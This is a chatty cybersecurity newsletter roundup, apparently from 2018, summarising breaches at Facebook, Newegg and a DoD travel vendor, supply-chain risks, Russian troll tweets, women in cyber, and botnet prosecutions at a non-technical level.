Cyber Bolt Cutters in the Supply Chain

A few months ago, the CyberBrief reported on an early 2018 incident where a Chinese hacker managed to get his (or her, or their) way into the servers of a contractor working for the U.S. Naval Undersea Warfare Center and steal nearly a terabyte of data. Yeah, that was a bad day. This, among other more recent incidents, has the government concerned that the cybersecurity industry hasn’t done enough to protect the vulnerable U.S. supply chain. And it’s probably true. According to a recent DoD report, while most cyber research is pretty heavy on things like cloud, data management and other IT services, the supply chain is often overlooked. But, considering the “infinite number of touch points” on a supply chain that can be exploited or corrupted, the time to secure our supply chains is now.

On Oct 4, Bloomberg reported that China had infected multiple U.S. bound products, including some sold by juggernauts like Amazon and Apple. This allegation has been vigorously denied by all the named companies, including the US Government but nonetheless, the article highlights very clearly how a supply chain attack like this could occur. Jennifer Bisceglie, head of Interos Solutions, asserts that “the average consumer does not really understand that technologies may be sharing information to Russia, China or North Korea.” And that’s a big deal considering that nearly 51 percent of all shipments to the top seven IT suppliers originate in China. So, what can we do about it? Well for starters, we all need to know where our important components are coming from. “Once a business understands who and where they are sourcing from, they might change who they partner with,” added Bisceglie.

Ignorance is bliss. But that bliss could cost us everything.

P.S. – We think Jennifer Bisceglie is pretty cool. In case you missed it, she was a featured speaker at the 2018 NCC Cyber Symposium. Fist bump to Jennifer…

We Need More Women in Cyber

If we haven’t mentioned it yet, October is National Cybersecurity Awareness Month. Cheers!

We think it’s the perfect time to make a case for more women in cybersecurity. In case you didn’t know it, currently women only make up a measly 20% of the cybersecurity workforce. Seriously? We can do better than that! Frankly, we need to do better than that. And it’s not just about bumping up a percentage or simply gender equality. With the massive shortage of 3 million cybersecurity professionals globally today, and the ever-growing threats around us, our industry needs every talented professional we can get – men and women alike. Diversity is a force multiplier and one we dearly need. It’s high time that we fight the misconception that jobs in STEM are really more ideal for men. Instead, we need to lead with the notion that tech and cybersecurity are just as well suited for women as for men.

Speaking of women in cyber, did we mention that we think Jennifer Bisceglie is basically a tech-Jedi? (hint: read the previous article).

Cybersecurity, Social Media & The Elections: Part 1

There’s no doubt that social media has given a voice and a platform for millions of people who may have otherwise been unseen and unheard. While social media companies may (or may not) be altruistic at heart, the same platforms provide the perfect ecosystem for bad actors and motivated political campaigns to use marketing, manipulation and “psychographic targeting” to sway elections. Yeah, we know you’ve heard it before but as the data unfolds from Cambridge Analytica and the like, the picture of technological deception becomes more pervasive than any of us imagined.

Last week, social media giant Twitter published an archive of a whopping 10 million tweets from phony troll accounts sent between 2013 and 2018. (yup…that includes the election year, 2016) The tweets originated from over 3,800 different accounts connected with the Russian Internet Research Agency, and another 770 accounts are said to have originated from Iran. Researchers assert that the Russian trolls use the exact same techniques that drive genuine engagement and activism online. It’s pretty clear that part of our job as the cybersecurity community is to do whatever we can to continue to give a voice to the digitally marginalized, while doubling down on stopping the bad guys and keep from weakening our democracy when it matters most.

DoD Hacked

That’s right. Not even the Department of Defense is immune to cyber criminals. According to the Associated Press, a data breach, which exposed personal and credit card information of at least 30K people, was discovered on Oct. 4th but the attack probably happened months earlier. The bad actors gained access via a travel management firm that handles a limited number of the DoD’s travel needs. A DoD spokesman asserts, “The Department is continuing to assess the risk of harm,” and “while additional information about this incident is being gathered, the department is assessing further remedial measures.”

How to Check if Your Facebook Account Was Hacked

Last week, we reported on Facebook’s worst-ever security breach. As many as 30 million users have been affected by the breach and hackers have successfully accessed 29 million of them. Even so, hackers weren’t able to gain access to any third-party app data, something that could have had even more serious consequences. Facebook published a blog post to give more details. Here’s what we know…

For 15 million users, usernames and contact information was compromised. For another 14 million users, additional information was accessed, including education, work, gender, religion hometown, and more. Private messages, it appears, were not hacked. Still, this is a huge deal for Facebook. If you want to check to see if you are one of the 30 million Facebookers hacked, you can do so by accessing their Help Center.

A Crack In New Eggs Data

If you’ve been following the CyberBrief, then you probably already know about the Ticketmaster and British Airways data breaches that went down earlier this year. Both of those breaches have been pinned on the notorious hacking group called Magecart. Last week, the cyber sleuths at Volexity and RiskIQ uncovered a new hack by Magecart that targeted the popular computer hardware and consumer electronics retailer, Newegg.

The hackers used what’s called a digital credit card skimmer, which is basically a tactic where the hackers gain access to an operating system and then insert a few lines of malicious code that are designed to capture and send sensitive credit card information. The hack occurred between August 14 and Sept 18, 2018. With over 50 million monthly web visitors, this hack is a pretty big deal. Newegg has fixed the problem and recommends that anyone who suspects that their data might have been compromised immediately contact your bank, block your payment card, and request for a replacement.

Facebook Hacked, Again

Remember that Bill Murray movie, Groundhog Day? Yeah, well…that for Facebook. The world’s biggest social media platform suffered another security breach as a staggering 50 million users were compromised by a sophisticated zero-day exploit that allowed hackers to steal account access. So, if you woke up anxious to check on Grumpy Cat’s (that’s the famous online cat, as if you didn’t know?) status and found yourself locked out of your Facebook account, you definitely weren’t alone. The social media giant admitted that an unknown hacker made away with secret access tokens for a user base as big as the population of Spain. As a security measure, Facebook reset all access tokens for the affected accounts, requiring users to login to Facebook and any apps that use Facebook for credentials.

Ned? Ned Ryerson! (classic Bill Murray)

Executives Getting Cyber-Strong

Marvel’s Infinity Wars brought the World’s superheroes together when Thanos, the baddest guy in the universe, threatened to destroy half the population. The same thing happened earlier this week in a room tucked away in the gardens behind the Governor’s Mansion in Denver. Well, sort of. The National Cybersecurity Center hosted 30 top executives from around the country for Cyber For Executives, an intensive, two-day executive cybersecurity training course.

The event was designed to give executive leaders and boards of directors the information and tools they need to understand and address the clear and present dangers of cybercrime. Featuring cyber experts Rick Crandall, Andre McGregor, Paul Rosen and Ray Watson, the event was eye-opening and transformational. If you missed it, don’t worry. The entire Cyber for Executives course was recorded and will be turned into an online course in partnership with Pikes Peak Community College. This is one way the National Cybersecurity Center is making a dent in executive security awareness and raising the bar for bad guys.

Young Hackers Help FBI to Avoid Jail

Three twenty-something hackers were nabbed for creating and spreading the notorious Mirai botnet, a sophisticated piece of IoT malware. Mirai was originally designed to hack the popular video game, Minecraft, but when the source code was released in the wild, it didn’t take long for serious bad actors to get a hold of it and put it to use on much more nefarious hacks. In a Mr. Robot-style twist, rather than face serious jail time, the young hackers agreed to help the FBI investigate and neutralize other complex cybercrime cases. And it worked. The trio were credited, in part, for the 2017 takedown of the dangerous Kelihos botnet. The case of the Mirai Three demonstrates the government’s commitment to “hold criminals accountable while encouraging offenders to choose a different path to apply their skills.”

Russian Hacker Pleads Guilty

Remember the Russian arrested for releasing the infamous Kelihos botnet? Looks like his hacking days are over, at least for a good while. Peter Yuryevich Levashov (one of his many online aliases) has finally plead guilty to computer crime, wire fraud, conspiracy and identity theft charges. The 38 year-old has admitted operating some of the most notorious malware botnetsincluding Storm, Waldac and Keilhos, which together infected over 100,000 computers and generated hundreds of millions of dollars for cybercriminals. Score one for the good guys.